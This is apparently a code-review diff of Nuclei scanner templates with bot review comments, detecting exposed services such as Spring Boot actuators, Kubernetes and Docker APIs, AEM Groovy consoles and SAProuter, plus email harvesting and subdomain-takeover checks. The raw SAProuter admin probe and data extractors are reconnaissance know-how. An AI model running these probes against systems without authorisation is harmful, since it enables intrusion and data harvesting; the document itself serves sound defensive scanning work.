@ -1,20 +1,16 @@
id: email-address-extraction
id: email-extractor
info:
name: Extract Email addresses
name: Email Extractor
author: panch0r3d
severity: info
tags: misc,email
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
regex:
- "[a-zA-Z0-9-_.]{4,}@[A-Za-z0-9_-]+[.](com|org|net|io|gov|co|co.uk|com.mx|com.br|com.sv|co.cr|com.gt|com.hn|com.ni|com.au|com.cn)"
extractors:
- type: regex
part: body
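Review bot: the extractor regex only accepts a fixed allowlist of TLDs (`com|org|net|io|gov|...`), so `.edu`, `.de`, `.info`, `.dev` and every other domain are silently missed; `[a-zA-Z0-9-_.]` also places a hyphen mid-class right after a range, which some engines read as a range. Prefer something like `\b[\w.+-]+@[\w-]+(\.[\w-]+)*\.[a-zA-Z]{2,}\b`, and since matchers are removed in this hunk, make sure the extractor still carries its `regex:` key (only `part: body` is visible here).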

View File

@ -2,7 +2,7 @@ id: aem-groovyconsole
info:
name: AEM Groovy console enabled
author: twitter.com/Dheerajmadhukar
author: Dheerajmadhukar
severity: critical
description: Groovy console is exposed, RCE is possible.
reference: https://hackerone.com/reports/672243

View File

@ -1,27 +1,29 @@
id: artifactory-anonymous-deploy
info:
name: Artifactory repos with anonymous deploy permissions
name: Artifactory anonymous deploy
reference: https://www.errno.fr/artifactory/Attacking_Artifactory.html
author: panch0r3d
severity: high
tags: artifactory
requests:
- method: GET
path:
- "{{BaseURL}}/artifactory/ui/repodata?deploy=true"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
matchers-condition: and
matchers:
- type: regex
regex:
- '(repoList).*?["].*["]'
- '(repoTypesList).*?["].*["]'
- type: word
words:
- '"repoKey"'
part: body
extractors:
- type: regex
part: body
regex:
- '(repoTypesList).*?["].*["]'
- '(repoList).*?["].*["]'
- type: status
status:
- 200
- type: word
words:
- "application/json"
part: header
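Review bot: the extractor patterns `(repoTypesList).*?["].*["]` and `(repoList).*?["].*["]` end with a greedy `.*`, so on a single-line JSON response they capture everything from the key to the last quote in the document, i.e. roughly the whole body. Since the new matcher already keys on `"repoKey"`, extract the deployable repositories directly with `"repoKey"\s*:\s*"([^"]+)"` (with a group) so the output lists repo names rather than the raw JSON.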

View File

@ -2,7 +2,7 @@ id: django-debug
info:
name: Django Debug Method Enabled
author: dhiyaneshDK & hackergautam
author: dhiyaneshDK,hackergautam
severity: medium
tags: django,debug

View File

@ -1,7 +1,7 @@
id: druid-monitor
info:
name: Druid Monitor Unauthorized Access
author: 0h1in9e @ohlinge
author: ohlinge
severity: high
tags: druid,unauth
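Review bot: this hunk normalises `0h1in9e @ohlinge` to `ohlinge`, but CVE-2018-1000129 earlier in the same diff normalises the same author to `0h1in9e`; pick one handle so attribution is consistent across templates.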

View File

@ -2,7 +2,7 @@ id: exposed-docker-api
info:
name: Exposed Docker API
author: furkansenan & dwisiswant0
author: furkansenan,dwisiswant0
severity: info
tags: docker,unauth,devops

View File

@ -1,27 +0,0 @@
id: firebase-urls
info:
name: Find firebaseio urls to check for security permissions
author: panch0r3d
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/"
redirects: true
max-redirects: 5
headers:
User-Agent: "Mozilla UACanary12345"
matchers-condition: and
matchers:
- type: regex
regex:
- ".*?(f|F)(i|I)(r|R)(e|E)(b|B)(a|A)(s|S)(e|E)(i|I)(o|O)[.](c|C)(o|O)(m|M).*?"
part: body
extractors:
- type: regex
part: body
regex:
- "([^]|[']|[ ]|[:]|http)*(f|F)(i|I)(r|R)(e|E)(b|B)(a|A)(s|S)(e|E)(i|I)(o|O)[.](c|C)(o|O)(m|M).*?([\r\n]|[}]|[,]|[>]|[-]|[ ]|['])"
- "([^]|[']|[ ]|[:]|http)*(d|D)(a|A)(t|T)(a|A)(b|B)(a|A)(s|S)(e|E).*?([\r\n]|[}]|[,]|[>]|[-]|[ ]|['])"
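Review bot: the extractor regexes here appear malformed: in RE2/Go a `]` directly after `[^` is a literal, so `[^]|[']` is one character class and the following `)` is unbalanced, which is presumably why the template is being dropped. Rather than losing the only check for exposed `firebaseio.com` database URLs, replace it with a readable case-insensitive extractor such as `(?i)[a-z0-9-]+\.firebaseio\.com` and a matching `database` pattern.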

View File

@ -2,7 +2,7 @@ id: front-page-misconfig
info:
name: FrontPage configuration information discloure
author: JTeles & pikpikcu
author: JTeles,pikpikcu
severity: info
reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
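Review bot: the context line `name: FrontPage configuration information discloure` has a typo (`disclosure`); fix it in this pass.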

View File

@ -2,7 +2,7 @@ id: java-melody-exposed
info:
name: JavaMelody Monitoring Exposed
author: dhiyaneshDK & thomas_from_offensity
author: dhiyaneshDK,thomas_from_offensity
severity: medium
description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a users session.
reference: |

View File

@ -2,7 +2,7 @@ id: kubernetes-pods-api
info:
name: Kubernetes Pods API
author: ilovebinbash & geeknik & 0xtavian
author: ilovebinbash,geeknik,0xtavian
severity: critical
description: When the service port is available, anyone can execute commands inside the container. See https://github.com/officialhocc/Kubernetes-Kubelet-RCE for inspiration.
reference: https://blog.binaryedge.io/2018/12/06/kubernetes-being-hijacked-worldwide/

View File

@ -0,0 +1,25 @@
id: sap-netweaver-info-leak
info:
name: SAP NetWeaver ICM Info page leak
author: randomstr1ng
description: Detection of SAP NetWeaver ABAP Webserver /public/info page
severity: medium
tags: sap,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/sap/public/info"
matchers:
- type: regex
part: body
regex:
- "RFC_SYSTEM_INFO.Response"
extractors:
- type: regex
part: body
regex:
- "<RFCDEST>.*</RFCDEST>"
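Review bot: the matcher regex `RFC_SYSTEM_INFO.Response` leaves the dot unescaped (matches any character); use `RFC_SYSTEM_INFO\.Response` and add a `status: 200` matcher so error pages that echo the string do not count. The `/sap/public/info` response also carries `RFCSYSID`, `RFCHOST`, `RFCKERNRL` and `RFCSAPRL`, which are more useful to extract than `RFCDEST` alone; consider extracting those too, and tighten `.*` to `[^<]*` so each element is captured individually.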

View File

@ -2,7 +2,7 @@ id: server-status-localhost
info:
name: Server Status Disclosure
author: pdteam & geeknik
author: pdteam,geeknik
severity: low
tags: apache,debug

View File

@ -2,7 +2,7 @@ id: shell-history
info:
name: Shell History
author: pentest_swissky & geeknik
author: pentest_swissky,geeknik
severity: low
description: Discover history for bash, ksh, sh, and zsh
tags: config

View File

@ -2,7 +2,7 @@ id: springboot-configprops
info:
name: Detect Springboot Configprops Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: Sensitive environment variables may not be masked
tags: springboot,disclosure

View File

@ -2,7 +2,7 @@ id: springboot-env
info:
name: Detect Springboot Env Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: Sensitive environment variables may not be masked
tags: springboot,disclosure

View File

@ -2,7 +2,7 @@ id: springboot-heapdump
info:
name: Detect Springboot Heapdump Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: critical
description: Environment variables and HTTP requests can be found in the HPROF
tags: springboot,disclosure

View File

@ -2,7 +2,7 @@ id: springboot-httptrace
info:
name: Detect Springboot httptrace
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: View recent HTTP requests and responses
tags: springboot,disclosure

View File

@ -2,7 +2,7 @@ id: springboot-loggers
info:
name: Detect Springboot Loggers
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: low
tags: springboot,disclosure

View File

@ -2,7 +2,7 @@ id: springboot-mappings
info:
name: Detect Springboot Mappings Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: Additional routes may be displayed
tags: springboot,disclosure

View File

@ -2,7 +2,7 @@ id: springboot-trace
info:
name: Detect Springboot Trace Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
author: that_juan_,dwisiswant0,wdahlenb
severity: low
description: View recent HTTP requests and responses
tags: springboot,disclosure

View File

@ -2,7 +2,7 @@ id: unauthenticated-nacos-access
info:
name: Unauthenticated Nacos access v1.x
author: taielab & @pikpikcu
author: taielab,pikpikcu
severity: critical
issues: https://github.com/alibaba/nacos/issues/4593
tags: nacos,unauth
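Review bot: `issues:` is not a recognised `info` field, so the GitHub issue link is ignored; move it under `reference:`.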

View File

@ -0,0 +1,24 @@
id: sap-router-info-leak
info:
name: SAPRouter - Routing information leak
author: randomstr1ng
severity: critical
tags: network,sap
network:
- inputs:
- data: 00000022524f555445525f41444d002802000000000000000000000000000000000000000000
type: hex
host:
- "{{Hostname}}"
- "{{Hostname}}:3299"
read-size: 2048
matchers:
- type: word
words:
- "Routtab"
- "Working directory"
- "SAProuter Connection Table"
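Review bot: `severity: critical` for a routing-table disclosure is out of line with `medium` on `sap-netweaver-info-leak` in the same diff; `high` at most seems appropriate for an information leak. With both `{{Hostname}}` and `{{Hostname}}:3299` in `host`, the probe is sent twice when the input already carries port 3299. `read-size: 2048` may also truncate the connection table on busy routers, so the `Routtab` / `Working directory` matches can fire while the table itself is cut off.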

network/sap-router.yaml Normal file
View File

@ -0,0 +1,22 @@
id: sap-router
info:
name: SAPRouter Detection
author: randomstr1ng
severity: info
tags: network,sap
network:
- inputs:
- data: 57484f415245594f553f0a
type: hex
host:
- "{{Hostname}}"
- "{{Hostname}}:3299"
read-size: 1024
matchers:
- type: word
words:
- "SAProuter"

View File

@ -2,7 +2,7 @@ id: unauth-ftp
info:
name: FTP Anonymous Login
author: Celesian ( @C3l3si4n )
author: C3l3si4n
severity: medium
reference: https://tools.ietf.org/html/rfc2577
tags: network,ftp

View File

@ -2,7 +2,7 @@ id: acquia-takeover
info:
name: Acquia Takeover Detection
author: pdcommunity
author: pdteam
severity: info
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
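Review bot: `acquia-takeover` is `severity: info` while every sibling takeover template in this diff (aftership, agilecrm, aha, airee, anima, aws-bucket, bigcartel, bitbucket, brightcove) is `high`; unless Acquia is known to be non-claimable, align it to `high`.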

View File

@ -2,7 +2,7 @@ id: aftership-takeover
info:
name: Aftership Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz

View File

@ -2,7 +2,7 @@ id: agilecrm-takeover
info:
name: agilecrm takeover detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz

View File

@ -2,7 +2,7 @@ id: aha-takeover
info:
name: Aha Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz

View File

@ -2,7 +2,7 @@ id: airee-takeover
info:
name: Airee Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz

View File

@ -2,7 +2,7 @@ id: anima-takeover
info:
name: Anima Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz

View File

@ -2,7 +2,7 @@ id: aws-bucket-takeover
info:
name: AWS Bucket Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover,aws
reference: https://github.com/EdOverflow/can-i-take-over-xyz

View File

@ -2,7 +2,7 @@ id: bigcartel-takeover
info:
name: Bigcartel Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz

View File

@ -2,7 +2,7 @@ id: bitbucket-takeover
info:
name: Bitbucket Takeover Detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz

View File

@ -2,7 +2,7 @@ id: brightcove-takeover
info:
name: brightcove takeover detection
author: pdcommunity
author: pdteam
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz

Some files were not shown because too many files have changed in this diff.